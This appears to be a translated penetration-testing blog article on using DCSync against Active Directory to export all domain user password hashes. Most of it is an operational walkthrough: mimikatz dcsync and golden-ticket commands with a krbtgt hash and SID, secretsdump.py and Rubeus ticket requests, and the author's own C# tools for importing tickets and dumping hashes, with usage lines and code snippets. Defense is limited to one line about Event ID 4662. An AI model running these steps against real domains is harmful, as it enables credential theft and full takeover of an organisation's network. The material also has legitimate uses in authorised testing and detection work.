0x00 Preface

---

In a previous article, 'Domain Penetration - DCSync,' the exploitation methods of DCSync were systematically summarized. This article will provide a detailed introduction to the method of exporting all domain user hashes using DCSync, analyze exploitation approaches in different environments, and offer defense recommendations.

0x01 Introduction

---

This article will cover the following topics:

  • Exploitation Conditions
  • Exploitation Tools
  • Exploitation Approaches
  • Defense Recommendations

0x02 Exploitation Conditions

---

Obtain permissions for any of the following users:

  • Users within the Administrators group
  • Users in the Domain Admins group
  • Users in the Enterprise Admins group
  • Computer accounts of domain controllers

0x03 Exploitation Tools

---

1.C Implementation (mimikatz)

Implementation code:

https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c#L27

Example commands:

(1) Export hashes of all users in the domain

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

(2) Export hash of the administrator account in the domain

mimikatz.exe "lsadump::dcsync /domain:test.com /user:administrator /csv" exit

2.Python Implementation (secretsdump.py)

Example commands:

python secretsdump.py test/Administrator:[email protected]

3. PowerShell Implementation (MakeMeEnterpriseAdmin)

Core code implemented in C#, supporting the following three functions:

  • Export hash of krbtgt user via DCSync
  • Generate Golden ticket using krbtgt user's hash
  • Import Golden ticket

Note:

My test environment results show that the Golden ticket generation function has a bug; corresponding permissions cannot be obtained after importing the Golden ticket

4. C# Implementation

Based on (MakeMeEnterpriseAdmin), I have made the following modifications:

  • Support exporting all user hashes
  • Export domain SID
  • Export all domain user SIDs

Code has been uploaded to GitHub, address as follows:

An open-source project

Supplement: Code Development Details

Output all keys and values in the Dictionary:

foreach(string key in values.Keys)
{
Console.WriteLine(string.Format("key:{0} value{1}", key, values[key]));
}

Convert byte array to string for hash output:

byte[] data = values["ATT_UNICODE_PWD"] as byte[];
Console.WriteLine(BitConverter.ToString(data).Replace("-",""));

Convert string to byte array to transform hash into byte array:

string hex = "D4FE97B4FD50367C7AE8FEF781F27A2E";
var inputByteArray = new byte[hex.Length / 2];
for (var x = 0; x < inputByteArray.Length; x++)
{
var i = Convert.ToInt32(hex.Substring(x * 2, 2), 16);
inputByteArray[x] = (byte)i;
}

0x04 Exploitation Approach

---

1. Execute on Domain Controller

All tools mentioned in 0x03 can be used

2. Execute on Domain Host

(1) Mimikatz

There are two exploitation approaches:

  • Import ticket, execute DCSync
  • Use Over pass the hash to launch script, script executes DCSync

(2) secretsdump.py

Execute directly

(3) C Sharp Implementation

First need to generate ticket

There are two exploitation approaches:

  1. Obtain the hash of the krbtgt user and generate a Golden ticket locally using Mimikatz

Command example:

mimikatz "kerberos::golden /user:Administrator /domain:TEST.COM /sid:S-1-5-21-254706111-4049838133-2416123456 /krbtgt:D4FE97B4FD50367C7AE8FEF781F27A2E /ticket:test.kirbi"

  1. Obtain a high-privilege user and use Rubeus to send a request to obtain a ticket

Command example:

Rubeus.exe asktgt /user:administrator /password:123456 /outfile:test.kirbi
Rubeus.exe asktgt /user:administrator /rc4:D4FE97B4FD50367C7AE8FEF781F27A2E /outfile:test.kirbi

Then import the ticket

You can choose SharpTGTImporter.cs, the code has been uploaded to GitHub, address as follows:

An open-source project

I have made the following modifications based on (MakeMeEnterpriseAdmin):

  • Supports importing specified ticket files

Command example:

SharpTGTImporter.exe test.kirbi

Finally execute DCSync

To export all user hashes, you can choose SharpDCSync.cs. The code has been uploaded to GitHub, address as follows:

An open-source project

Command example:

SharpDCSync.exe dc1.test.com TEST.COM

To export the krbtgt user hash, you can choose SharpDCSync_krbtgt.cs. The code has been uploaded to GitHub, address as follows:

An open-source project

Command example:

SharpDCSync_krbtgt.exe dc1.test.com TEST.COM

3. Execute on a host outside the domain

Method is the same as "2. Execute on a host inside the domain"

0x05 Defense Recommendations

---

The attacker requires permissions from any of the following users:

  • Users within the Administrators group
  • Users in the Domain Admins group
  • Users in the Enterprise Admins group
  • Computer accounts of domain controllers

Event log detection can be performed by monitoring Event ID 4662

References:

https://www.blacklanternsecurity.com/2020-12-04-DCSync/

0x06 Summary

---

This article introduces methods for exporting all user hashes within a domain using DCSync. Based on (MakeMeEnterpriseAdmin), code was developed in SharpTGTImporter.cs and SharpDCSync.cs for ease of exploitation. Combined with exploitation approaches, defensive recommendations are provided.